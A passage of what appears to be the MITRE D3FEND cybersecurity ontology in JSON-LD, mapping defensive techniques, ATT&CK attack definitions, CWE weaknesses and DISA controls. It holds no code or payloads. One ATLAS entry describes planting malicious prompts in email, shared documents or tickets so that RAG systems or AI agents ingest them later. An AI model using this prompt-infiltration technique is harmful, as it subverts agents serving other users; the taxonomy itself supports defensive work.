      "d3f:kb-article": "## How it works\n\nEmail removal is a technique that can be used to prevent a user from executing malware or responding to phishing attempts. Security software or users themselves may detect malicious or suspicious email in a local or remote mail folder email and then employ this technique.\n\n## Considerations\n\nFor email that needs to be removed, an infosec organization may choose to take additional follow-up actions (such as blocking the sources or notifying providers), rather than only relying on email deletion.\n\nFor the case where users detect likely suspicious email files, the organization should consider implementing a means for reporting these emails to their infosec organization.\n\nEmail files may propagate through many storage systems across the an organization's systems over time, so early detection and blocking helps avoid residual, latent stores of malicous email content in the enterprise.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForScanningRemoteServicesToLocateStoredObjectsWithMalware"
      },
      "d3f:may-access": {
        "@id": "d3f:MailServer"
      },
      "d3f:synonym": "Email Deletion",
      "rdfs:label": "Email Removal",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEviction"
        },
        {
          "@id": "_:N043f4cbf02f448709fc4d9d3185b399f"
        },
        {
          "@id": "_:N2ef8d6cbd941427ba355f98487d0f6f4"
        }
      ]
    },
    {
      "@id": "_:N043f4cbf02f448709fc4d9d3185b399f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:N2ef8d6cbd941427ba355f98487d0f6f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailServer"
      }
    },
    {
      "@id": "d3f:d3fend-artifact-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-artifact-data-property y: The artifact x has the data property y.",
      "rdfs:domain": {
        "@id": "d3f:DigitalArtifact"
      },
      "rdfs:label": "d3fend-artifact-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:WindowsNtWriteVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtWriteVirtualMemory",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteMemory"
      }
    },
    {
      "@id": "d3f:T0890",
      "@type": "owl:Class",
      "d3f:attack-id": "T0890",
      "d3f:definition": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. (Citation: The MITRE Corporation)",
      "rdfs:label": "Exploitation for Privilege Escalation - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSPrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Exploitation for Privilege Escalation"
    },
    {
      "@id": "d3f:DS0027",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used",
      "rdfs:comment": "This data source captures events relating to hardware drivers and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Driver (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-000018_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically audits account creation actions.",
      "d3f:exactly": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000018"
    },
    {
      "@id": "d3f:Hardware-basedProcessIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Hardware-basedProcessIsolation"
      ],
      "d3f:d3fend-id": "D3-HBPI",
      "d3f:definition": "Preventing one process from writing to the memory space of another process through hardware based address manager implementations.",
      "d3f:isolates": {
        "@id": "d3f:Process"
      },
      "d3f:kb-article": "## How it works\nProcess isolation, in this context, is address space separation controlled by a security function that limits the communication between processes so that one process cannot directly modify the executing code of another process. For example with virtual address space:\n\n* Process A address space is different from process B address space, which prevents process A from writing to process B\n\nHardware process isolation is commonly implemented through Direct Memory Access (DMA) which collaborates with a Memory Management Unit (MMU), or Input-Output Memory Management Unit (IOMMU). These hardware controls are deployed directly on processors to aid hosts or enclaves in process isolation.\n\n* DMA - Direct memory access allows memory access to occur independently of the program currently run by the microprocessor. DMA allows for I/O devices to directly read from and write to memory, or it can be used to efficiently copy blocks of memory. During DMA transfers, the microprocessor can execute an unrelated program.\n* MMU - A memory management unit acts as an access control and is responsible for performing the translation of virtual memory addresses to physical memory addresses. The MMU allocates each process its own virtual memory space.\n* IOMMU - An input-output memory management unit is used to allocate each I/O device its own virtual address space to the underlying physical addresses. IOMMU allows devices that do not support long memory addresses to address the entire memory space.\n\n## Considerations\n* Private hosts may be vulnerable to DMA attack if they have a PCI or PCI Express port that connects attached devices directly to physical address space.\n\n## Implementations:\n * Intel Virtualization Technology for Directed I/O (Intel VT-d)\n * Firecracker",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-VirtualizedProcessIsolation_AdvancedMicroDevicesInc"
        },
        {
          "@id": "d3f:Reference-ApproachesForSecuringAnInternetEndpointUsingFine-grainedOperatingSystemVirtualization_Bromium,Inc."
        },
        {
          "@id": "d3f:Reference-IsolationOfApplicationsWithinAVirtualMachine_Bromium,Inc."
        }
      ],
      "d3f:restricts": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:synonym": "Virtualization",
      "rdfs:label": "Hardware-based Process Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "_:Nbfa8c4d6f7c24f78b2ffd927f2f83c40"
        },
        {
          "@id": "_:N3561d9337acc4920aacf6d277bc37837"
        }
      ]
    },
    {
      "@id": "_:Nbfa8c4d6f7c24f78b2ffd927f2f83c40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "_:N3561d9337acc4920aacf6d277bc37837",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:SSHConnectionCloseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the termination of an SSH connection, signaling the end of a secure session.",
      "rdfs:label": "SSH Connection Close Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionCloseEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        },
        {
          "@id": "_:Nf14703fa70a443cdb51b9694997df5d6"
        }
      ]
    },
    {
      "@id": "_:Nf14703fa70a443cdb51b9694997df5d6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHConnectionOpenEvent"
      }
    },
    {
      "@id": "d3f:CCI-002397_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, in conjunction with a remote device, prevents the device from simultaneously establishing non-remote connections with the system and communicating via some other connection to resources in external networks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002397"
    },
    {
      "@id": "d3f:T1419",
      "@type": "owl:Class",
      "d3f:attack-id": "T1419",
      "d3f:definition": "On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by",
      "rdfs:label": "Device Type Discovery - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "Device Type Discovery"
    },
    {
      "@id": "d3f:GNSSReceiver",
      "@type": "owl:Class",
      "d3f:definition": "A GNSS (Global Navigation Satellite System) receiver is an electronic device that picks up signals from one or more satellite constellations (like GPS, GLONASS, Galileo, BeiDou) to calculate precise location, velocity, and time.",
      "rdfs:label": "GNSS Receiver",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Satellite_navigation"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "d3f:GraphicsCardFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on a computer graphics card.",
      "rdfs:label": "Graphics Card Firmware",
      "rdfs:seeAlso": {
        "@id": "d3f:Firmware"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "Video Card Firmware"
    },
    {
      "@id": "d3f:BitmapImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphical image whose data is stored in a grid format.",
      "rdfs:label": "Bitmap Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalImage"
      }
    },
    {
      "@id": "d3f:Reference-DistributedMeta-informationQueryInANetwork_Bit9Inc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20070028302A1/en?oq=US-2007028302-A1"
      },
      "d3f:kb-abstract": "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and social engineering attacks. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. A server associated with a number of hosts can provide a query for host computers to access security-related meta-information in local host stores. The query is pulled from the server by the hosts. The results of the distributed host query are stored and merged on the server, and exported for display, reports, or security response.",
      "d3f:kb-author": "Todd Brennan; John Hanratty",
      "d3f:kb-mitre-analysis": "Provides a mechanism to detect, monitor, locate, and control files installed on host computers. Each host has a host agent that analyzes file system activity and takes action based on policies configured on a server. The policies identify whether to block, log, allow, or quarantine actions such as file accesses and execution of executables. Examples of policies include:\n\n* Block/log execution of new executables and detached scripts (e.g., .exe or .bat)\n* Block/log reading/execution of new embedded content (e.g., macros in .doc)\n* Block/log installation/modification of Web content (alteration of content in .html or .cgi files)\n* Block/log execution of new files in an administratively defined 'class'; e.g., an administrator might want to block screen savers .scr, but not the entire class of executables .exe, .dll, .sys, etc . . .",
      "d3f:kb-organization": "Bit 9 Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:kb-reference-title": "Distributed meta-information query in a network",
      "rdfs:label": "Reference - Distributed meta-information query in a network - Bit 9 Inc"
    },
    {
      "@id": "d3f:T1078.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.001",
      "d3f:definition": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)",
      "d3f:uses": {
        "@id": "d3f:DefaultUserAccount"
      },
      "rdfs:label": "Default Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:N6eb25da1e9f3445687d2dce7ffeb5041"
        }
      ]
    },
    {
      "@id": "_:N6eb25da1e9f3445687d2dce7ffeb5041",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefaultUserAccount"
      }
    },
    {
      "@id": "d3f:RestoreUserAccountAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreUserAccountAccess"
      ],
      "d3f:d3fend-id": "D3-RUAA",
      "d3f:definition": "Restoring a user account's access to resources.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Restore User Account Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreAccess"
        },
        {
          "@id": "_:N0261c2219a494a7fac80eb3a56685412"
        }
      ]
    },
    {
      "@id": "_:N0261c2219a494a7fac80eb3a56685412",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-000163_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit information from unauthorized modification.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000163"
    },
    {
      "@id": "d3f:T1098.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1098.005",
      "d3f:definition": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.",
      "rdfs:label": "Device Registration",
      "rdfs:subClassOf": {
        "@id": "d3f:T1098"
      }
    },
    {
      "@id": "d3f:T1195.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1195.002",
      "d3f:definition": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.",
      "d3f:modifies": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Compromise Software Supply Chain",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1195"
        },
        {
          "@id": "_:Nb92b98b72cf548eb959c14370b744a97"
        }
      ]
    },
    {
      "@id": "_:Nb92b98b72cf548eb959c14370b744a97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1053",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1053",
      "d3f:definition": "The sub-techniques of this are specific software implementations of scheduling capabilities.",
      "d3f:executes": {
        "@id": "d3f:ScheduledJob"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:modifies": {
        "@id": "d3f:JobSchedule"
      },
      "rdfs:label": "Scheduled Task/Job",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N340d58ac476248a982f10c4471bcde4f"
        },
        {
          "@id": "_:N89b4574e8daf406f9e6c946dfee01d4b"
        },
        {
          "@id": "_:N762e48fdc73b457ca89d331442cf662b"
        }
      ]
    },
    {
      "@id": "_:N340d58ac476248a982f10c4471bcde4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "_:N89b4574e8daf406f9e6c946dfee01d4b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N762e48fdc73b457ca89d331442cf662b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "d3f:TA0100",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Collection - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Collection"
    },
    {
      "@id": "d3f:deceives",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "deceives",
      "rdfs:subPropertyOf": {
        "@id": "d3f:counters"
      }
    },
    {
      "@id": "d3f:ST0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to establish resources they can use to support operations.",
      "d3f:display-order": 2,
      "rdfs:label": "Resource Development - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Resource Development"
    },
    {
      "@id": "d3f:Linux_Exit",
      "@type": "owl:Class",
      "d3f:definition": "Terminate the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/exit.2.html"
      },
      "rdfs:label": "Linux _Exit",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITerminateProcess"
      }
    },
    {
      "@id": "d3f:CWE-617",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-617",
      "d3f:definition": "The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.",
      "d3f:synonym": "assertion failure",
      "rdfs:label": "Reachable Assertion",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:CWE-561",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-561",
      "d3f:definition": "The product contains dead code, which can never be executed.",
      "rdfs:label": "Dead Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:T1538",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CloudConfiguration"
      },
      "d3f:attack-id": "T1538",
      "d3f:definition": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)",
      "rdfs:label": "Cloud Service Dashboard",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N98c2170b708b44c5a4709460427860f2"
        }
      ]
    },
    {
      "@id": "_:N98c2170b708b44c5a4709460427860f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:T1201",
      "@type": "owl:Class",
      "d3f:attack-id": "T1201",
      "d3f:definition": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks that adhere to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).",
      "rdfs:label": "Password Policy Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002617_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization removes organization-defined software components (e.g., previous versions) after updated versions have been installed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002617"
    },
    {
      "@id": "d3f:CloudInstanceMetadata",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Cloud instance metadata is configuration information on the instance and users of the instance.  This includes such information as security groups, public IP addresses, and private addresses, public keys configured, and even rotating security keys. User data can contain initialization scripts, variables, passwords, and more.",
      "rdfs:label": "Cloud Instance Metadata",
      "rdfs:seeAlso": {
        "@id": "https://isc.sans.edu/forums/diary/Cloud+Metadata+Urls/22046"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:T1556.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.007",
      "d3f:definition": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.",
      "rdfs:label": "Hybrid Identity",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CCI-002533_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains a separate execution domain for each thread in organization-defined multi-threaded processing.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Kernel-basedProcessIsolation"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002533"
    },
    {
      "@id": "d3f:Authentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A request-response comprising a user credential presentation to a system and a verification response.",
      "rdfs:label": "Authentication",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Authentication"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00155053-n"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveAction"
        },
        {
          "@id": "_:N2906d17b0f79460ca5ac436f14233798"
        },
        {
          "@id": "_:N89ca761319904f10bf07bb77dd87ef12"
        },
        {
          "@id": "_:N498b62668b7040f1b4034bfc73b88a1e"
        }
      ]
    },
    {
      "@id": "_:N2906d17b0f79460ca5ac436f14233798",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:User"
      }
    },
    {
      "@id": "_:N89ca761319904f10bf07bb77dd87ef12",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "_:N498b62668b7040f1b4034bfc73b88a1e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:originates-from"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLocation"
      }
    },
    {
      "@id": "d3f:SharedResourceAccessFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Resource"
      },
      "d3f:definition": "A function which accesses a shared resource.",
      "rdfs:label": "Shared Resource Access Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N70538cd48cf243ffacd3fb870df76997"
        }
      ]
    },
    {
      "@id": "_:N70538cd48cf243ffacd3fb870df76997",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:modifies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x modifies y: A technique or agent x causes a digital object y to change; become different; or undertake a transformation.  Afterwards, the data or state held by a digital object is changed.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00126072-v"
      },
      "rdfs:label": "modifies",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:accesses"
        },
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-modify"
        }
      ],
      "skos:altLabel": "alters"
    },
    {
      "@id": "d3f:T1478",
      "@type": "owl:Class",
      "d3f:attack-id": "T1478",
      "d3f:definition": "An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1632.001",
      "rdfs:label": "Install Insecure or Malicious Configuration - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1632.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Install Insecure or Malicious Configuration"
    },
    {
      "@id": "d3f:AML.T0093",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0093",
      "d3f:definition": "An adversary may introduce malicious prompts into the victim's system via a public-facing application with the intention of it being ingested by an AI at some point in the future and ultimately having a downstream effect. This may occur when a data source is indexed by a retrieval augmented generation (RAG) system, when a rule triggers an action by an AI agent, or when a user utilizes a large language model (LLM) to interact with the malicious content. The malicious prompts may persist on the victim system for an extended period and could affect multiple users and various AI tools within the victim organization.\n\nAny public-facing application that accepts text input could be a target. This includes email, shared document systems like OneDrive or Google Drive, and service desks or ticketing systems like Jira.\n\nAdversaries may perform [Reconnaissance](/tactics/AML.TA0002) to identify public facing applications that are likely monitored by an AI agent or are likely to be indexed by a RAG. They may perform [Discover AI Agent Configuration](/techniques/AML.T0084) to refine their targeting.",
      "rdfs:label": "Prompt Infiltration via Public-Facing Application - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0093"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATLASPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Prompt Infiltration via Public-Facing Application"
    },
    {
      "@id": "d3f:MicrosoftWordDOTFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOT File"
    },
    {
      "@id": "d3f:VolumeSnapshot",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A volume snapshot is a point-in-time copy of a storage volume.",
      "rdfs:isDefinedBy": {
        "@id": "https://kubernetes-csi.github.io/docs/snapshot-restore-feature.html"
      },
      "rdfs:label": "Volume Snapshot",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Shadow_Copy"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StorageSnapshot"
      }
    },
    {
      "@id": "d3f:CCI-001749_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the installation of organization-defined software components without verification the software component has been digitally signed using a certificate that is recognized and approved by the organization.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001749"
    },
    {
      "@id": "d3f:runs",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x runs y: To carry out a process or program y, as on a computer or a machine x; where y may be a large software assembly or a specific module or instruction.  Examples: \"run a new program on the Mac\"; \"the computer runs the application software\".",
      "rdfs:label": "runs",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02569242-v"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-run"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000015_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:AccountLocking"
        },
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to support the information system account management functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000015"
    },
    {
      "@id": "d3f:JavaArchive",
      "@type": "owl:Class",
